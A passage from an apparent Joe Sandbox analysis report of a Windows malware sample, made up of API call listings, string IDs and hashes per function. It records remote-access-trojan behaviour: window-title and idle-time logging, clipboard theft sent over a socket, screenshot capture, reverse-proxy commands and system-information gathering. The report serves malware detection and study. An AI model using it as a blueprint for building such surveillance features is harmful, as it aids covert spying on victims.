                                • Opcode Fuzzy Hash: a13eae8444da2cd2cd5bd958d846eb3c57669df7893581f63a52b2ce53b4c5f1
                                • Instruction Fuzzy Hash: E391F472E002069ADB209E65CC42AEFBBF59F09756F14052BFC01E7282D739DD89C768
                                Uniqueness

                                Uniqueness Score: -1.00%

                                APIs
                                • MultiByteToWideChar.KERNEL32(00000001,00000000,?,?,00000000,00000000,?,$C,0043EA24,?,?,PkGNG,0044AE9A,00000001,00000001,73E85006), ref: 0044ACA3
                                • __alloca_probe_16.LIBCMT ref: 0044ACDB
                                • MultiByteToWideChar.KERNEL32(00000001,00000001,?,?,00000000,?,?,?,PkGNG,0044AE9A,00000001,00000001,73E85006,?,?,?), ref: 0044AD29
                                • __alloca_probe_16.LIBCMT ref: 0044ADC0
                                • WideCharToMultiByte.KERNEL32(00000001,00000000,00000000,00000000,?,73E85006,00000000,00000000,?,00000400,00000000,?,00000000,00000000,00000000,00000000), ref: 0044AE23
                                • __freea.LIBCMT ref: 0044AE30
                                  • Part of subcall function 00446137: RtlAllocateHeap.NTDLL(00000000,004352BC,?,?,00438847,?,?,00000000,00476B50,?,0040DE62,004352BC,?,?,?,?), ref: 00446169
                                • __freea.LIBCMT ref: 0044AE39
                                • __freea.LIBCMT ref: 0044AE5E
                                Strings
                                Memory Dump Source
                                • Source File: 00000000.00000002.1967304191.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                • Associated: 00000000.00000002.1967291341.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                                • Associated: 00000000.00000002.1967360265.0000000000459000.00000002.00000001.01000000.00000003.sdmp
                                • Associated: 00000000.00000002.1967379795.0000000000471000.00000004.00000001.01000000.00000003.sdmp
                                • Associated: 00000000.00000002.1967379795.0000000000474000.00000004.00000001.01000000.00000003.sdmp
                                • Associated: 00000000.00000002.1967405295.0000000000478000.00000002.00000001.01000000.00000003.sdmp
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_0_2_400000_1m70ggeepT.jbxd
                                Yara matches
                                Similarity
                                • API ID: ByteCharMultiWide__freea$__alloca_probe_16$AllocateHeap
                                • String ID: $C$PkGNG
                                • API String ID: 3864826663-3740547665
                                • Opcode ID: f1dce60ce4001dd5a90d09b77d0bc29d4a24cdc1178cf7b183dfabd27102bb0f
                                • Instruction ID: b5b01290aead076256688b5938d42e4b2a7c64905c3dece0b68445a47d4ef5f6
                                • Opcode Fuzzy Hash: f1dce60ce4001dd5a90d09b77d0bc29d4a24cdc1178cf7b183dfabd27102bb0f
                                • Instruction Fuzzy Hash: 1F513A72680206AFFB258F64CC41EBF77AAEB44714F24462EFC14D6240EB38DC60875A
                                Uniqueness

                                Uniqueness Score: -1.00%

                                APIs
                                Strings
                                Memory Dump Source
                                • Source File: 00000000.00000002.1967304191.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                • Associated: 00000000.00000002.1967291341.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                                • Associated: 00000000.00000002.1967360265.0000000000459000.00000002.00000001.01000000.00000003.sdmp
                                • Associated: 00000000.00000002.1967379795.0000000000471000.00000004.00000001.01000000.00000003.sdmp
                                • Associated: 00000000.00000002.1967379795.0000000000474000.00000004.00000001.01000000.00000003.sdmp
                                • Associated: 00000000.00000002.1967405295.0000000000478000.00000002.00000001.01000000.00000003.sdmp
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_0_2_400000_1m70ggeepT.jbxd
                                Yara matches
                                Similarity
                                • API ID: _free
                                • String ID: \&G$\&G$`&G
                                • API String ID: 269201875-253610517
                                • Opcode ID: 2933b358ac1f2d15da9e4f95fb537f888405f593b8ad3400f10d75b262a195a6
                                • Instruction ID: 0b3297c67b001fbc5a9f4fbe1fd197d652097ca420ae28a40b4f72db8b3ed5d1
                                • Opcode Fuzzy Hash: 2933b358ac1f2d15da9e4f95fb537f888405f593b8ad3400f10d75b262a195a6
                                • Instruction Fuzzy Hash: 77610475900204AFDB20CFA9C882B9ABBF4EF05315F14416BED58EB342D774AD458B98
                                Uniqueness

                                Uniqueness Score: -1.00%

                                Strings
                                Memory Dump Source
                                • Source File: 00000000.00000002.1967304191.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                • Associated: 00000000.00000002.1967291341.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                                • Associated: 00000000.00000002.1967360265.0000000000459000.00000002.00000001.01000000.00000003.sdmp
                                • Associated: 00000000.00000002.1967379795.0000000000471000.00000004.00000001.01000000.00000003.sdmp
                                • Associated: 00000000.00000002.1967379795.0000000000474000.00000004.00000001.01000000.00000003.sdmp
                                • Associated: 00000000.00000002.1967405295.0000000000478000.00000002.00000001.01000000.00000003.sdmp
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_0_2_400000_1m70ggeepT.jbxd
                                Yara matches
                                Similarity
                                • API ID:
                                • String ID: 65535$udp
                                • API String ID: 0-1267037602
                                • Opcode ID: c855b19cc43d9bec36cd86ac5f012ace8f0d54e169e32fa1a21da6d4488bf9b2
                                • Instruction ID: ff24d6befd6f0703c902a6165bd45161ed4db0fb5f75d2635e7e580b9b2721aa
                                • Opcode Fuzzy Hash: c855b19cc43d9bec36cd86ac5f012ace8f0d54e169e32fa1a21da6d4488bf9b2
                                • Instruction Fuzzy Hash: EF51E7756093019FDB209B58E9057BB37A4AFC4755F08082FF881973A1E76DCCC1865E
                                Uniqueness

                                Uniqueness Score: -1.00%

                                APIs
                                • __Init_thread_footer.LIBCMT ref: 0040AD38
                                • Sleep.KERNEL32(000001F4), ref: 0040AD43
                                • GetForegroundWindow.USER32 ref: 0040AD49
                                • GetWindowTextLengthW.USER32(00000000), ref: 0040AD52
                                • GetWindowTextW.USER32(00000000,00000000,00000000), ref: 0040AD86
                                • Sleep.KERNEL32(000003E8), ref: 0040AE54
                                  • Part of subcall function 0040A636: SetEvent.KERNEL32(00000000,?,00000000,0040B20A,00000000), ref: 0040A662
                                Strings
                                Memory Dump Source
                                • Source File: 00000000.00000002.1967304191.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                • Associated: 00000000.00000002.1967291341.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                                • Associated: 00000000.00000002.1967360265.0000000000459000.00000002.00000001.01000000.00000003.sdmp
                                • Associated: 00000000.00000002.1967379795.0000000000471000.00000004.00000001.01000000.00000003.sdmp
                                • Associated: 00000000.00000002.1967379795.0000000000474000.00000004.00000001.01000000.00000003.sdmp
                                • Associated: 00000000.00000002.1967405295.0000000000478000.00000002.00000001.01000000.00000003.sdmp
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_0_2_400000_1m70ggeepT.jbxd
                                Yara matches
                                Similarity
                                • API ID: Window$SleepText$EventForegroundInit_thread_footerLength
                                • String ID: [${ User has been idle for $ minutes }$]
                                • API String ID: 911427763-3954389425
                                • Opcode ID: d029bd4235179839c9baf363e6aa800d014436574332bd325cff9a7a557b710f
                                • Instruction ID: 3d5ee5432c15115af2c0f1375ae13a0ba8112eb59c463c5c733e63bb31497985
                                • Opcode Fuzzy Hash: d029bd4235179839c9baf363e6aa800d014436574332bd325cff9a7a557b710f
                                • Instruction Fuzzy Hash: 6D51B1316043419BD314FB21D846AAE7796AB84308F50093FF586A22E2EF7C9D45C69F
                                Uniqueness

                                Uniqueness Score: -1.00%

                                APIs
                                • OpenClipboard.USER32 ref: 00416941
                                • EmptyClipboard.USER32 ref: 0041694F
                                • CloseClipboard.USER32 ref: 00416955
                                • OpenClipboard.USER32 ref: 0041695C
                                • GetClipboardData.USER32(0000000D), ref: 0041696C
                                • GlobalLock.KERNEL32(00000000), ref: 00416975
                                • GlobalUnlock.KERNEL32(00000000), ref: 0041697E
                                • CloseClipboard.USER32 ref: 00416984
                                  • Part of subcall function 00404AA1: send.WS2_32(?,00000000,00000000,00000000), ref: 00404B36
                                Strings
                                Memory Dump Source
                                • Source File: 00000000.00000002.1967304191.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                • Associated: 00000000.00000002.1967291341.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                                • Associated: 00000000.00000002.1967360265.0000000000459000.00000002.00000001.01000000.00000003.sdmp
                                • Associated: 00000000.00000002.1967379795.0000000000471000.00000004.00000001.01000000.00000003.sdmp
                                • Associated: 00000000.00000002.1967379795.0000000000474000.00000004.00000001.01000000.00000003.sdmp
                                • Associated: 00000000.00000002.1967405295.0000000000478000.00000002.00000001.01000000.00000003.sdmp
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_0_2_400000_1m70ggeepT.jbxd
                                Yara matches
                                Similarity
                                • API ID: Clipboard$CloseGlobalOpen$DataEmptyLockUnlocksend
                                • String ID: !D@$hdF
                                • API String ID: 2172192267-3475379602
                                • Opcode ID: 217266dddd972f3c5e9f703bebafc66beb3104e9651149c41c4633369744174b
                                • Instruction ID: 305b70c8a6b081cbeb1fc088e42579eafb4add048c4ccd3ac1cf7446a02d8759
                                • Opcode Fuzzy Hash: 217266dddd972f3c5e9f703bebafc66beb3104e9651149c41c4633369744174b
                                • Instruction Fuzzy Hash: CC015E31214301DFC714BB72DC09AAE77A5AF88742F40047EF906821E2DF38CC44CA69
                                Uniqueness

                                Uniqueness Score: -1.00%

                                APIs
                                • MultiByteToWideChar.KERNEL32(?,00000000,00000050,000000FF,00000000,00000000,?,?,?,00401D55,?,00000050,%Y-%m-%d %H.%M,00000000), ref: 0043A892
                                • GetLastError.KERNEL32(?,?,00401D55,?,00000050,%Y-%m-%d %H.%M,00000000), ref: 0043A89F
                                • __dosmaperr.LIBCMT ref: 0043A8A6
                                • MultiByteToWideChar.KERNEL32(?,00000000,00000050,000000FF,00000000,00000000,?,?,?,00401D55,?,00000050,%Y-%m-%d %H.%M,00000000), ref: 0043A8D2
                                • GetLastError.KERNEL32(?,?,?,00401D55,?,00000050,%Y-%m-%d %H.%M,00000000), ref: 0043A8DC
                                • __dosmaperr.LIBCMT ref: 0043A8E3
                                • WideCharToMultiByte.KERNEL32(?,00000000,00000000,000000FF,00000000,?,00000000,00000000,?,?,?,?,?,?,00401D55,?), ref: 0043A926
                                • GetLastError.KERNEL32(?,?,?,?,?,?,00401D55,?,00000050,%Y-%m-%d %H.%M,00000000), ref: 0043A930
                                • __dosmaperr.LIBCMT ref: 0043A937
                                • _free.LIBCMT ref: 0043A943
                                • _free.LIBCMT ref: 0043A94A
                                Memory Dump Source
                                • Source File: 00000000.00000002.1967304191.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                • Associated: 00000000.00000002.1967291341.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                                • Associated: 00000000.00000002.1967360265.0000000000459000.00000002.00000001.01000000.00000003.sdmp
                                • Associated: 00000000.00000002.1967379795.0000000000471000.00000004.00000001.01000000.00000003.sdmp
                                • Associated: 00000000.00000002.1967379795.0000000000474000.00000004.00000001.01000000.00000003.sdmp
                                • Associated: 00000000.00000002.1967405295.0000000000478000.00000002.00000001.01000000.00000003.sdmp
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_0_2_400000_1m70ggeepT.jbxd
                                Yara matches
                                Similarity
                                • API ID: ByteCharErrorLastMultiWide__dosmaperr$_free
                                • String ID:
                                • API String ID: 2441525078-0
                                • Opcode ID: be2abdef093630236b46a14047e2354cdf10b582d669b9bb945715f91254eceb
                                • Instruction ID: 785efe6d9c8e3fffb8b85045f967b8474775cb8629fdf0d32462ae01257f7f2e
                                • Opcode Fuzzy Hash: be2abdef093630236b46a14047e2354cdf10b582d669b9bb945715f91254eceb
                                • Instruction Fuzzy Hash: FF31F57140420AFFDF01AFA5CC45DAF3B68EF09325F10021AF950662A1DB38CD21DB6A
                                Uniqueness

                                Uniqueness Score: -1.00%

                                APIs
                                • __EH_prolog.LIBCMT ref: 00419FB9
                                • GdiplusStartup.GDIPLUS(00474ACC,?,00000000), ref: 00419FEB
                                • CreateDirectoryW.KERNEL32(00000000,00000000,00000000,0000001A,00000019), ref: 0041A077
                                • Sleep.KERNEL32(000003E8), ref: 0041A0FD
                                • GetLocalTime.KERNEL32(?), ref: 0041A105
                                • Sleep.KERNEL32(00000000,00000018,00000000), ref: 0041A1F4
                                Strings
                                Memory Dump Source
                                • Source File: 00000000.00000002.1967304191.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                • Associated: 00000000.00000002.1967291341.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                                • Associated: 00000000.00000002.1967360265.0000000000459000.00000002.00000001.01000000.00000003.sdmp
                                • Associated: 00000000.00000002.1967379795.0000000000471000.00000004.00000001.01000000.00000003.sdmp
                                • Associated: 00000000.00000002.1967379795.0000000000474000.00000004.00000001.01000000.00000003.sdmp
                                • Associated: 00000000.00000002.1967405295.0000000000478000.00000002.00000001.01000000.00000003.sdmp
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_0_2_400000_1m70ggeepT.jbxd
                                Yara matches
                                Similarity
                                • API ID: Sleep$CreateDirectoryGdiplusH_prologLocalStartupTime
                                • String ID: (x$time_%04i%02i%02i_%02i%02i%02i$wnd_%04i%02i%02i_%02i%02i%02i
                                • API String ID: 489098229-3148520567
                                • Opcode ID: 0e7dd5b9c8f3c8bbf87e47502bed00745cf23af802625de92c9b4d39b7d12e2e
                                • Instruction ID: 65e100c03f0dda0ba9a952c873ad8774fe275ee1deca45487f64c7c8a8292b0e
                                • Opcode Fuzzy Hash: 0e7dd5b9c8f3c8bbf87e47502bed00745cf23af802625de92c9b4d39b7d12e2e
                                • Instruction Fuzzy Hash: E7515D70A00215AACB14BBB5C8529ED7BA9AB44308F40403FF509AB1E2EF7C9D85C799
                                Uniqueness

                                Uniqueness Score: -1.00%

                                APIs
                                • SetEvent.KERNEL32(?,?), ref: 004054BF
                                • GetMessageA.USER32(?,00000000,00000000,00000000), ref: 0040556F
                                • TranslateMessage.USER32(?), ref: 0040557E
                                • DispatchMessageA.USER32(?), ref: 00405589
                                • HeapCreate.KERNEL32(00000000,00000000,00000000,00000074,00474F78), ref: 00405641
                                • HeapFree.KERNEL32(00000000,00000000,0000003B,0000003B,?,00000000), ref: 00405679
                                  • Part of subcall function 00404AA1: send.WS2_32(?,00000000,00000000,00000000), ref: 00404B36
                                Strings
                                Memory Dump Source
                                • Source File: 00000000.00000002.1967304191.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                • Associated: 00000000.00000002.1967291341.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                                • Associated: 00000000.00000002.1967360265.0000000000459000.00000002.00000001.01000000.00000003.sdmp
                                • Associated: 00000000.00000002.1967379795.0000000000471000.00000004.00000001.01000000.00000003.sdmp
                                • Associated: 00000000.00000002.1967379795.0000000000474000.00000004.00000001.01000000.00000003.sdmp
                                • Associated: 00000000.00000002.1967405295.0000000000478000.00000002.00000001.01000000.00000003.sdmp
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_0_2_400000_1m70ggeepT.jbxd
                                Yara matches
                                Similarity
                                • API ID: Message$Heap$CreateDispatchEventFreeTranslatesend
                                • String ID: CloseChat$DisplayMessage$GetMessage
                                • API String ID: 2956720200-749203953
                                • Opcode ID: 23ad1bda7fdc8c2761b743bccdaa4a1370e03c4646df2a0694b798356af57b05
                                • Instruction ID: c1940132788662b917c5ec79ff16bb55de46c7435784779dc5fc992d72e4b12f
                                • Opcode Fuzzy Hash: 23ad1bda7fdc8c2761b743bccdaa4a1370e03c4646df2a0694b798356af57b05
                                • Instruction Fuzzy Hash: CE41A171604701ABCB14FB75DC5A86F37A9AB85704F40093EF916A36E1EF3C8905CB9A
                                Uniqueness

                                Uniqueness Score: -1.00%

                                APIs
                                  • Part of subcall function 00417F2C: __EH_prolog.LIBCMT ref: 00417F31
                                • WaitForSingleObject.KERNEL32(00000000,000000FF,00000070,004660A4), ref: 00417DDC
                                • CloseHandle.KERNEL32(00000000), ref: 00417DE5
                                • DeleteFileA.KERNEL32(00000000), ref: 00417DF4
                                • ShellExecuteExA.SHELL32(0000003C,00000000,00000010,?,?,?), ref: 00417DA8
                                  • Part of subcall function 00404AA1: send.WS2_32(?,00000000,00000000,00000000), ref: 00404B36
                                Strings
                                Memory Dump Source
                                • Source File: 00000000.00000002.1967304191.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                • Associated: 00000000.00000002.1967291341.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                                • Associated: 00000000.00000002.1967360265.0000000000459000.00000002.00000001.01000000.00000003.sdmp
                                • Associated: 00000000.00000002.1967379795.0000000000471000.00000004.00000001.01000000.00000003.sdmp
                                • Associated: 00000000.00000002.1967379795.0000000000474000.00000004.00000001.01000000.00000003.sdmp
                                • Associated: 00000000.00000002.1967405295.0000000000478000.00000002.00000001.01000000.00000003.sdmp
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_0_2_400000_1m70ggeepT.jbxd
                                Yara matches
                                Similarity
                                • API ID: CloseDeleteExecuteFileH_prologHandleObjectShellSingleWaitsend
                                • String ID: 0VG$0VG$<$@$Temp
                                • API String ID: 1704390241-2575729100
                                • Opcode ID: 98959ef4594bcaafc024db97d5732f010b7230a0abd9b713f16470a190596f9f
                                • Instruction ID: cfce1e327495ca125f9f778a73892d1ad62a3a088d665d9de3c725e9e650d499
                                • Opcode Fuzzy Hash: 98959ef4594bcaafc024db97d5732f010b7230a0abd9b713f16470a190596f9f
                                • Instruction Fuzzy Hash: 0E415F319002099BCB14FB62DC56AEE7775AF40318F50417EF506764E1EF7C1A8ACB99
                                Uniqueness

                                Uniqueness Score: -1.00%

                                APIs
                                • std::_Lockit::_Lockit.LIBCPMT ref: 00410E6E
                                • int.LIBCPMT ref: 00410E81
                                  • Part of subcall function 0040E0C1: std::_Lockit::_Lockit.LIBCPMT ref: 0040E0D2
                                  • Part of subcall function 0040E0C1: std::_Lockit::~_Lockit.LIBCPMT ref: 0040E0EC
                                • std::_Facet_Register.LIBCPMT ref: 00410EC1
                                • std::_Lockit::~_Lockit.LIBCPMT ref: 00410ECA
                                • __CxxThrowException@8.LIBVCRUNTIME ref: 00410EE8
                                • __Init_thread_footer.LIBCMT ref: 00410F29
                                Strings
                                Memory Dump Source
                                • Source File: 00000000.00000002.1967304191.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                • Associated: 00000000.00000002.1967291341.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                                • Associated: 00000000.00000002.1967360265.0000000000459000.00000002.00000001.01000000.00000003.sdmp
                                • Associated: 00000000.00000002.1967379795.0000000000471000.00000004.00000001.01000000.00000003.sdmp
                                • Associated: 00000000.00000002.1967379795.0000000000474000.00000004.00000001.01000000.00000003.sdmp
                                • Associated: 00000000.00000002.1967405295.0000000000478000.00000002.00000001.01000000.00000003.sdmp
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_0_2_400000_1m70ggeepT.jbxd
                                Yara matches
                                Similarity
                                • API ID: std::_$Lockit$Lockit::_Lockit::~_$Exception@8Facet_Init_thread_footerRegisterThrow
                                • String ID: ,kG$0kG$@!G
                                • API String ID: 3815856325-312998898
                                • Opcode ID: 03644fa62921dd73c80b911a5d0dfda0042f6ff91148d324d9cd636e449b66af
                                • Instruction ID: 12cf7b7900226bd12227407fb3b1cbab205c4dd0745ae636880afd2a72082c2f
                                • Opcode Fuzzy Hash: 03644fa62921dd73c80b911a5d0dfda0042f6ff91148d324d9cd636e449b66af
                                • Instruction Fuzzy Hash: 162134329005249BC704EB6AD9428DE37A8EF48324F20056FF804A72D1DBB9AD81CB9D
                                Uniqueness

                                Uniqueness Score: -1.00%

                                APIs
                                • OpenSCManagerW.ADVAPI32(00000000,00000000,00000011,00000000,00000001,?,?,?,?,?,?,0041A486,00000000), ref: 0041AB1C
                                • OpenServiceW.ADVAPI32(00000000,00000000,000F003F,?,?,?,?,?,?,0041A486,00000000), ref: 0041AB33
                                • CloseServiceHandle.ADVAPI32(00000000,?,?,?,?,?,?,0041A486,00000000), ref: 0041AB40
                                • ControlService.ADVAPI32(00000000,00000001,?,?,?,?,?,?,?,0041A486,00000000), ref: 0041AB4F
                                • CloseServiceHandle.ADVAPI32(00000000,?,?,?,?,?,?,0041A486,00000000), ref: 0041AB60
                                • CloseServiceHandle.ADVAPI32(00000000,?,?,?,?,?,?,0041A486,00000000), ref: 0041AB63
                                Memory Dump Source
                                • Source File: 00000000.00000002.1967304191.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                • Associated: 00000000.00000002.1967291341.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                                • Associated: 00000000.00000002.1967360265.0000000000459000.00000002.00000001.01000000.00000003.sdmp
                                • Associated: 00000000.00000002.1967379795.0000000000471000.00000004.00000001.01000000.00000003.sdmp
                                • Associated: 00000000.00000002.1967379795.0000000000474000.00000004.00000001.01000000.00000003.sdmp
                                • Associated: 00000000.00000002.1967405295.0000000000478000.00000002.00000001.01000000.00000003.sdmp
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_0_2_400000_1m70ggeepT.jbxd
                                Yara matches
                                Similarity
                                • API ID: Service$CloseHandle$Open$ControlManager
                                • String ID:
                                • API String ID: 221034970-0
                                • Opcode ID: c0082c5762a569dd6c794232c9d09aac69d1526d84f90b8f2ddcc8f825e948b5
                                • Instruction ID: 6fbe0b082825830d9e24babaefac53afed48758aa8e56b4d18e4903ff4329a9c
                                • Opcode Fuzzy Hash: c0082c5762a569dd6c794232c9d09aac69d1526d84f90b8f2ddcc8f825e948b5
                                • Instruction Fuzzy Hash: 41114C71901218AFD711AF64DCC4DFF3B7CDB42B62B000036FA05D2192DB289C46AAFA
                                Uniqueness

                                Uniqueness Score: -1.00%

                                APIs
                                • _free.LIBCMT ref: 00448135
                                  • Part of subcall function 00446782: HeapFree.KERNEL32(00000000,00000000,?,00450C6F,?,00000000,?,00000000,?,00450F13,?,00000007,?,?,0045145E,?), ref: 00446798
                                  • Part of subcall function 00446782: GetLastError.KERNEL32(?,?,00450C6F,?,00000000,?,00000000,?,00450F13,?,00000007,?,?,0045145E,?,?), ref: 004467AA
                                • _free.LIBCMT ref: 00448141
                                • _free.LIBCMT ref: 0044814C
                                • _free.LIBCMT ref: 00448157
                                • _free.LIBCMT ref: 00448162
                                • _free.LIBCMT ref: 0044816D
                                • _free.LIBCMT ref: 00448178
                                • _free.LIBCMT ref: 00448183
                                • _free.LIBCMT ref: 0044818E
                                • _free.LIBCMT ref: 0044819C
                                Memory Dump Source
                                • Source File: 00000000.00000002.1967304191.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                • Associated: 00000000.00000002.1967291341.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                                • Associated: 00000000.00000002.1967360265.0000000000459000.00000002.00000001.01000000.00000003.sdmp
                                • Associated: 00000000.00000002.1967379795.0000000000471000.00000004.00000001.01000000.00000003.sdmp
                                • Associated: 00000000.00000002.1967379795.0000000000474000.00000004.00000001.01000000.00000003.sdmp
                                • Associated: 00000000.00000002.1967405295.0000000000478000.00000002.00000001.01000000.00000003.sdmp
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_0_2_400000_1m70ggeepT.jbxd
                                Yara matches
                                Similarity
                                • API ID: _free$ErrorFreeHeapLast
                                • String ID:
                                • API String ID: 776569668-0
                                • Opcode ID: 27d76b13a5ecae076ca6598a5b1433465caaf67949f0bdc0fbde8a5d49186781
                                • Instruction ID: 63500befab30bf138fa449b3e81d3956d19e40097f86fc95f12732a98ce5ff4f
                                • Opcode Fuzzy Hash: 27d76b13a5ecae076ca6598a5b1433465caaf67949f0bdc0fbde8a5d49186781
                                • Instruction Fuzzy Hash: C211B67A500508BFEB01EF96C842CDD3BA5FF05359B0240AAFA588F222DA35DF509BC5
                                Uniqueness

                                Uniqueness Score: -1.00%

                                APIs
                                • RegOpenKeyExA.ADVAPI32(80000002,Software\Microsoft\Windows\CurrentVersion\Uninstall,00000000,00020019,?), ref: 0041C6B1
                                • RegEnumKeyExA.ADVAPI32(?,00000000,?,?,00000000,00000000,00000000,00000000), ref: 0041C6F5
                                • RegCloseKey.ADVAPI32(?), ref: 0041C9BF
                                Strings
                                • Software\Microsoft\Windows\CurrentVersion\Uninstall, xrefs: 0041C6A7
                                • DisplayName, xrefs: 0041C73C
                                Memory Dump Source
                                • Source File: 00000000.00000002.1967304191.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_0_2_400000_1m70ggeepT.jbxd
                                Yara matches
                                Similarity
                                • API ID: CloseEnumOpen
                                • String ID: DisplayName$Software\Microsoft\Windows\CurrentVersion\Uninstall
                                • API String ID: 1332880857-3614651759
                                • Opcode ID: 34f8705e0c0f93922566264f33deac87a441625c0d7611431a9fca3829c404f1
                                • Instruction ID: af0903b0dab8fbea49832074ad132f154b97281cd99b968e1e8b6bf9777b958e
                                • Opcode Fuzzy Hash: 34f8705e0c0f93922566264f33deac87a441625c0d7611431a9fca3829c404f1
                                • Instruction Fuzzy Hash: 248144711083419BC325EF11D851EEFB7E8BF94309F10492FB589921A1FF78AE49CA5A
                                Uniqueness

                                Uniqueness Score: -1.00%

                                APIs
                                Strings
                                Memory Dump Source
                                • Source File: 00000000.00000002.1967304191.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_0_2_400000_1m70ggeepT.jbxd
                                Yara matches
                                Similarity
                                • API ID: Eventinet_ntoa
                                • String ID: GetDirectListeningPort$StartForward$StartReverse$StopForward$StopReverse$NG
                                • API String ID: 3578746661-3604713145
                                • Opcode ID: ab18085dfb9070501b6a617d13a9934c7a772270e49a3b63cf56808473da2604
                                • Instruction ID: 71dfdc03858149a45142756d2b421c0b7bbb6d70992310a40494c7f1f0681c69
                                • Opcode Fuzzy Hash: ab18085dfb9070501b6a617d13a9934c7a772270e49a3b63cf56808473da2604
                                • Instruction Fuzzy Hash: 0051C131A042015BC614FB36C91AAAE37A5AB85344F40453FF906A76F1EF7C8985C7DE
                                Uniqueness

                                Uniqueness Score: -1.00%

                                APIs
                                • GetConsoleCP.KERNEL32(FF8BC35D,00000000,?,?,?,?,?,?,PkGNG,0044BB31,?,00000000,FF8BC35D,00000000,00000000,FF8BC369), ref: 0044B3FE
                                • __fassign.LIBCMT ref: 0044B479
                                • __fassign.LIBCMT ref: 0044B494
                                • WideCharToMultiByte.KERNEL32(?,00000000,00000000,00000001,FF8BC35D,00000005,00000000,00000000), ref: 0044B4BA
                                • WriteFile.KERNEL32(?,FF8BC35D,00000000,0044BB31,00000000,?,?,?,?,?,?,?,?,PkGNG,0044BB31,?), ref: 0044B4D9
                                • WriteFile.KERNEL32(?,?,00000001,0044BB31,00000000,?,?,?,?,?,?,?,?,PkGNG,0044BB31,?), ref: 0044B512
                                Strings
                                Memory Dump Source
                                • Source File: 00000000.00000002.1967304191.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_0_2_400000_1m70ggeepT.jbxd
                                Yara matches
                                Similarity
                                • API ID: FileWrite__fassign$ByteCharConsoleMultiWide
                                • String ID: PkGNG
                                • API String ID: 1324828854-263838557
                                • Opcode ID: e1ab2fdd82c1bf82b8ea5de4eaaa1e5c3a736621917fd27297e58c6e874c6116
                                • Instruction ID: 24f44d390d373c30b0d8a34eda065edd0bccebe0da4884afe324d1cece3cc5ea
                                • Opcode Fuzzy Hash: e1ab2fdd82c1bf82b8ea5de4eaaa1e5c3a736621917fd27297e58c6e874c6116
                                • Instruction Fuzzy Hash: 0751D270900208AFDB10CFA8D885AEEFBF4EF09305F14856BE955E7292D734D941CBA9
                                Uniqueness

                                Uniqueness Score: -1.00%

                                APIs
                                • ShellExecuteW.SHELL32(00000000,open,dxdiag,00000000,00000000,00000000), ref: 004174F5
                                  • Part of subcall function 0041C485: CreateFileW.KERNEL32(00000000,80000000,00000003,00000000,00000003,00000080,00000000,00000000,?,?,00000000,0040412F,00465E74), ref: 0041C49E
                                • Sleep.KERNEL32(00000064), ref: 00417521
                                • DeleteFileW.KERNEL32(00000000), ref: 00417555
                                Strings
                                Memory Dump Source
                                • Source File: 00000000.00000002.1967304191.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_0_2_400000_1m70ggeepT.jbxd
                                Yara matches
                                Similarity
                                • API ID: File$CreateDeleteExecuteShellSleep
                                • String ID: /t $\sysinfo.txt$dxdiag$open$temp
                                • API String ID: 1462127192-2001430897
                                • Opcode ID: f10e294ee6a8c27b1349ad3ce0c7058653f24f1ec6cf567e6a5304385f617d5d
                                • Instruction ID: 51d64fe7c8a5c54eac4555a52c350958ac4104e8f54c8767ba2a87230734c78e
                                • Opcode Fuzzy Hash: f10e294ee6a8c27b1349ad3ce0c7058653f24f1ec6cf567e6a5304385f617d5d
                                • Instruction Fuzzy Hash: 1431307194011A9ADB04FB62DC96DED7779AF50309F40017EF606730E2EF785A8ACA9C
                                Uniqueness

                                Uniqueness Score: -1.00%

                                APIs
                                • GetCurrentProcess.KERNEL32(00472B14,00000000,?,00003000,00000004,00000000,00000001), ref: 004073DD
